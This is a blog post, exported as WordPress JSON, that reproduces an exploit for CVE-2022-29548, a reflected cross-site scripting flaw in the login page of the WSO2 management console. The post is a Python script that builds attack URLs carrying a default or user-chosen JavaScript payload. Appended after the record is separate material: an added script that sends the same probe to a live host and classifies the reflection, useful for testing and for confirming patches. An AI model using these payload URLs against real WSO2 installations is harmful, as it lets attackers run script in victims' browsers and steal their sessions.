{"id":26290,"date":"2022-06-27T22:30:00","date_gmt":"2022-06-27T18:30:00","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167587\/ws02mc-xss.txt"},"modified":"2022-07-13T10:52:36","modified_gmt":"2022-07-13T06:22:36","slug":"wso2-management-console-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wso2-management-console-cross-site-scripting\/","title":{"rendered":"WSO2 Management Console Cross Site Scripting"},"content":{"rendered":"<pre dir=\"ltr\"><code># Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)\r\n# Date: 21 Apr 2022\r\n# Exploit Author: cxosmo\r\n# Vendor Homepage: https:\/\/wso2.com\r\n# Software Link: API Manager (https:\/\/wso2.com\/api-manager\/), Identity Server (https:\/\/wso2.com\/identity-server\/), Enterprise Integrator (https:\/\/wso2.com\/integration\/)\r\n# Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0;\r\n# API Manager Analytics 2.2.0, 2.5.0, and 2.6.0;\r\n# API Microgateway 2.2.0;\r\n# Data Analytics Server 3.2.0;\r\n# Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0;\r\n# IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0;\r\n# Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0;\r\n# Identity Server Analytics 5.5.0 and 5.6.0;\r\n# WSO2 Micro Integrator 1.0.0.\r\n# Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)\r\n# CVE: CVE-2022-29548\r\n\r\nimport argparse\r\nimport logging\r\nimport urllib.parse\r\n\r\n# Global variables\r\nVULNERABLE_ENDPOINT = \"\/carbon\/admin\/login.jsp?loginStatus=false&amp;errorCode=\"\r\nDEFAULT_PAYLOAD = \"alert(document.domain)\"\r\n\r\n# Logging config\r\nlogging.basicConfig(level=logging.INFO, format=\"\")\r\nlog = logging.getLogger()\r\n\r\n\r\ndef generate_payload(url, custom_payload=False):\r\n    # The %27) prefix closes the quoted string and the call that login.jsp builds around\r\n    # errorCode; the JavaScript then runs and the trailing \/\/ comments out the remainder\r\n    log.info(f\"Generating payload for {url}...\")\r\n    if custom_payload:\r\n        log.info(f\"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}\/\/\")\r\n    else:\r\n        log.info(f\"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}\/\/\")\r\n\r\n\r\ndef clean_url_input(url):\r\n    # Reduce scheme:\/\/host[:port]\/anything to scheme:\/\/host[:port]\r\n    if url.count(\"\/\") &gt; 2:\r\n        return f\"{url.split('\/')[0]}\/\/{url.split('\/')[2]}\"\r\n    else:\r\n        return url\r\n\r\n\r\ndef check_payload(payload):\r\n    # Double quotes and angle brackets are HTML-entity encoded by the page, so a payload\r\n    # containing them is reflected but never executes\r\n    encoded_characters = ['\"', '&lt;', '&gt;']\r\n    if any(character in payload for character in encoded_characters):\r\n        log.info(f\"Unsupported character(s) (\\\", &lt;, &gt;) found in payload.\")\r\n        return False\r\n    else:\r\n        return urllib.parse.quote(payload)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    # Parse command line\r\n    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)\r\n    required_arguments = parser.add_argument_group('required arguments')\r\n    required_arguments.add_argument(\"-t\", \"--target\",\r\n                                    help=\"Target address {protocol:\/\/host} of vulnerable WSO2 application (e.g. https:\/\/localhost:9443)\",\r\n                                    required=True, action=\"store\")\r\n    parser.add_argument(\"-p\", \"--payload\",\r\n                        help=\"Use custom JavaScript for generated payload (Some characters (\\\"&lt;&gt;) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))\",\r\n                        action=\"store\", default=False)\r\n    args = parser.parse_args()\r\n\r\n    # Clean user target input\r\n    args.target = clean_url_input(args.target.lower())\r\n\r\n    # Check for unsupported characters in custom payload; URL-encode as required.\r\n    # A rejected custom payload falls back to the default one.\r\n    if args.payload:\r\n        args.payload = check_payload(args.payload)\r\n    if args.payload:\r\n        generate_payload(args.target, args.payload)\r\n    else:\r\n        generate_payload(args.target)\r\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: WSO2 Management Console (Multiple Products) &#8211; Unauthenticated Reflected Cross-Site Scripting (XSS) # Date: 21 Apr 2022 # Exploit Author: cxosmo # Vendor Homepage: https:\/\/wso2.com # Software Link: API Manager (https:\/\/wso2.com\/api-manager\/), Identity Server (https:\/\/wso2.com\/identity-server\/), Enterprise Integrator (https:\/\/wso2.com\/integration\/) # Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0; # API Manager 
&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-26290","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/26290","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=26290"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/26290\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=26290"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=26290"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=26290"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
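The PoC in the record above only prints a URL; it never confirms that the target actually reflects the probe unescaped, which is what a tester needs before reporting and what a defender needs to show a build is fixed. The following is an added example, not part of cxosmo's advisory and not WSO2 code. It assumes the reflection context the PoC's `%27);...//` prefix implies (errorCode landing inside a single-quoted JavaScript string), and the `showLoginError()` name in the constructed sample bodies is a placeholder for whatever call login.jsp really wraps around the parameter. The `ENDPOINT` constant, the random token, `fetch()` and the verdict names are this example's own.

```python
"""Added verification helper for the WSO2 Carbon login.jsp reflected XSS (CVE-2022-29548).

This is an added example, not cxosmo's PoC and not WSO2 code. It builds the same
probe URL the PoC prints, then classifies how a response body reflects the probe.
The sample bodies are constructed, and showLoginError() is a placeholder for
whatever JavaScript call login.jsp actually wraps around errorCode.
"""
import html
import re
import secrets
import ssl
import urllib.error
import urllib.parse
import urllib.request

ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode="
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


def build_probe(base_url, js="alert(document.domain)", token=None):
    """Return (url, raw_probe); raw_probe is the exact text a vulnerable page reflects.

    A random token inside a JS comment ties the reflection check to this request,
    so static text on the page cannot produce a false positive.
    """
    if any(c in js for c in '"<>'):
        raise ValueError('", < and > are HTML-entity encoded by the page; unsupported in js')
    token = token or secrets.token_hex(4)
    raw = f"');{js}/*{token}*///"          # same shape as the PoC: %27); <js> //
    url = base_url.rstrip("/") + ENDPOINT + urllib.parse.quote(raw, safe="")
    return url, raw


def classify_reflection(body, raw_probe):
    """Classify how the probe came back; only the first verdict means the XSS fires."""
    for script in SCRIPT_RE.findall(body):
        if raw_probe in script:
            return "unescaped-in-script"      # ') breaks out of the JS string: vulnerable
    if raw_probe in body:
        return "reflected-outside-script"  # raw, but in HTML text; <> are encoded so this payload will not run
    if raw_probe in html.unescape(body):
        return "reflected-encoded"         # the quote was entity-encoded: patched or sanitised
    return "absent"


def fetch(url, insecure=True, timeout=10.0):
    """GET the probe URL. Carbon listens on 9443 with a self-signed certificate by
    default, so certificate checks are off unless insecure=False."""
    ctx = ssl.create_default_context()
    if insecure:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2022-29548-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:     # error pages can reflect too
        return err.read().decode("utf-8", "replace")


# Constructed sample responses (not captured from a real install), one per verdict.
SAMPLE_URL, SAMPLE_RAW = build_probe("https://localhost:9443/", "alert(1)", token="c0ffee")
SAMPLE_BODIES = {
    "vulnerable": f"<html><script>showLoginError('{SAMPLE_RAW}');</script></html>",
    "fixed": f"<html><script>showLoginError('{html.escape(SAMPLE_RAW, quote=True)}');</script></html>",
    "outside": f'<html><div class="error">{SAMPLE_RAW}</div></html>',
    "absent": "<html><script>showLoginError('');</script></html>",
}


def demo():
    """Run the classifier over the constructed bodies; returns {name: verdict}."""
    return {name: classify_reflection(body, SAMPLE_RAW) for name, body in SAMPLE_BODIES.items()}


if __name__ == "__main__":
    import sys
    for name, verdict in demo().items():
        print(f"sample {name:10s} -> {verdict}")
    if len(sys.argv) > 1:                      # python3 check.py https://host:9443
        url, raw = build_probe(sys.argv[1])
        print("probe:", url)
        print("live verdict:", classify_reflection(fetch(url), raw))
```

Only `unescaped-in-script` is a confirmed finding. `reflected-outside-script` means the parameter is echoed raw somewhere the PoC's string-breakout does not apply, and because the advisory states that `"`, `<` and `>` are entity-encoded, that location is not exploitable with this payload. `reflected-encoded` is what a sanitised build looks like when the quote is entity-encoded; a build that JS-escapes the quote instead (for example `\x27`) would show up as `absent`, so treat `absent` as "not reproduced", not as "not vulnerable", and confirm the installed version against the vendor advisory.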